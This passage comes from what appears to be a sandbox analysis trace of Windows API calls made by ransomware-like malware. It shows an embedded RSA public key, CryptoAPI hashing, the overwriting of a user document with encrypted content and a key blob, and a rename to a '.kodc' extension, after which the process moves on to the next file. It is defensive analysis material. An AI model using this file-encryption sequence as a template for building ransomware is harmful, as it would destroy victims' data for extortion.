KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.686] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.687] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.687] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.687] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.687] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.687] GetLastError () returned 0x0 [0098.688] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.688] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.688] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.688] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.688] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa690) returned 0x9ba4d90 [0098.688] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d498 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aaf0 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d4e0 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab08 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab38 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab50 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.689] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab38 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab50 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab50 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ab38 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab50 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab38 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.690] GetCurrentThreadId () returned 0x42c [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f478 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.690] GetCurrentThreadId () returned 0x42c [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab38 [0098.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab50 [0098.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab20 [0098.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab68 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab38 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab38 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab38 | out: hHeap=0x630000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab68 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab50 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab20 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab08 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d4e0 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.694] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xa68f, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xa68f, lpOverlapped=0x0) returned 1 [0098.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.694] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa694, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.694] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.695] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.695] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.695] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.695] CloseHandle (hObject=0x5cc) returned 1 [0098.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.698] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\suY5F BlZ0nU Aw4D.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\suy5f blz0nu aw4d.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\suY5F BlZ0nU Aw4D.odp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\suy5f blz0nu aw4d.odp.kodc")) returned 1 [0098.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.699] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.700] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a99b970, ftCreationTime.dwHighDateTime=0x1d5c35a, ftLastAccessTime.dwLowDateTime=0x22b77a80, ftLastAccessTime.dwHighDateTime=0x1d5c089, ftLastWriteTime.dwLowDateTime=0x22b77a80, ftLastWriteTime.dwHighDateTime=0x1d5c089, nFileSizeHigh=0x0, nFileSizeLow=0x71ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TBEA9Q3sVHj.odt", cAlternateFileName="TBEA9Q~1.ODT")) returned 1 [0098.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.700] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBEA9Q3sVHj.odt") returned=".odt" [0098.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBEA9Q3sVHj.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbea9q3svhj.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.701] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=29100) returned 1 [0098.701] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.704] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7186, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.704] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.705] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.705] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x71ac, lpOverlapped=0x0) returned 1 [0098.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") 